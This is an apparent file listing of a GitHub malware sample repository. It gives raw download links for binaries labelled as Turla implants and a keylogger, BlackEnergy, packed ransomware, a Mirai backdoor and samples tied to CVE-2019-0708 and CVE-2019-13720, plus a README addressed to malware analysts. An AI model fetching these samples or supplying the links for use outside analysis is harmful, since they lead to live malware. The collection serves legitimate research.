https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/NCSC.bin -------------------------------------------------------------------------------- /Turla/Nautilus Implant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/Nautilus Implant.bin -------------------------------------------------------------------------------- /Turla/NeuronImplant2018.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/NeuronImplant2018.bin -------------------------------------------------------------------------------- /Turla/OutlookBackdoor.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/OutlookBackdoor.bin -------------------------------------------------------------------------------- /Turla/OutlookBackdoor2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/OutlookBackdoor2.bin -------------------------------------------------------------------------------- /Turla/TurlaAgent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaAgent.exe -------------------------------------------------------------------------------- /Turla/TurlaDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaDropper.bin -------------------------------------------------------------------------------- /Turla/TurlaKeylogger.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaKeylogger.bin -------------------------------------------------------------------------------- /Turla/TurlaSnakeImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaSnakeImplant.bin -------------------------------------------------------------------------------- /UNC1945/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /UNC1945/【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UNC1945/【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534 -------------------------------------------------------------------------------- /UPXsamples/MiraiELFBackdoorUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/MiraiELFBackdoorUPX.bin -------------------------------------------------------------------------------- /UPXsamples/PackedRansomwareUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/PackedRansomwareUPX.bin -------------------------------------------------------------------------------- /UPXsamples/ProcessHowllowingPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/ProcessHowllowingPacked.bin -------------------------------------------------------------------------------- /UPXsamples/SaturnRansomewareUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/SaturnRansomewareUPX.bin -------------------------------------------------------------------------------- /UPXsamples/ScarabRansomwareUPX.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/ScarabRansomwareUPX.exe -------------------------------------------------------------------------------- /UPXsamples/TrojanUPXPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/TrojanUPXPacked.bin -------------------------------------------------------------------------------- /UPXsamples/Unlock26RansomewarePacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/Unlock26RansomewarePacked.bin -------------------------------------------------------------------------------- /UPXsamples/arsstealersafeloaderUPX.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/arsstealersafeloaderUPX.exe -------------------------------------------------------------------------------- /UPXsamples/yodascrypterUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/yodascrypterUPX.bin -------------------------------------------------------------------------------- /VoodooBearAPT/BlackEnergy.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/VoodooBearAPT/BlackEnergy.bin -------------------------------------------------------------------------------- /VoodooBearAPT/BlackEnergyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/VoodooBearAPT/BlackEnergyImplant.bin -------------------------------------------------------------------------------- /WizardOpium/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /WizardOpium/【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/WizardOpium/【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin -------------------------------------------------------------------------------- /__APTGroupInfoLinks.txt__: -------------------------------------------------------------------------------- 1 | https://www.fireeye.com/current-threats/apt-groups.html 2 | 3 | https://apt.securelist.com/#!/threats/ 4 | 5 | https://dragos.com/adversaries.html 6 | -------------------------------------------------------------------------------- /__DO NOT RUN SAMPLES ON YOUR HOST COMPUTER! USE A VIRTUAL MACHINE__.txt: -------------------------------------------------------------------------------- 1 | !!!DO NOT RUN SAMPLES ON YOUR OWN HOST/BOX. USE A VIRTUAL MACHINES!!! 2 | -------------------------------------------------------------------------------- /__README__.txt: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite Malware samples here for other security researchers/malware analyst's to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** 9 | 10 | For more information on each of the samples use Virustotal,Hybrid Analysis,and or on any other Threat Intelligence Platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | 0xffff0800 Contact: 0xffff0800@protonmail.com 15 | 16 | --------------------------------------------------------------------------------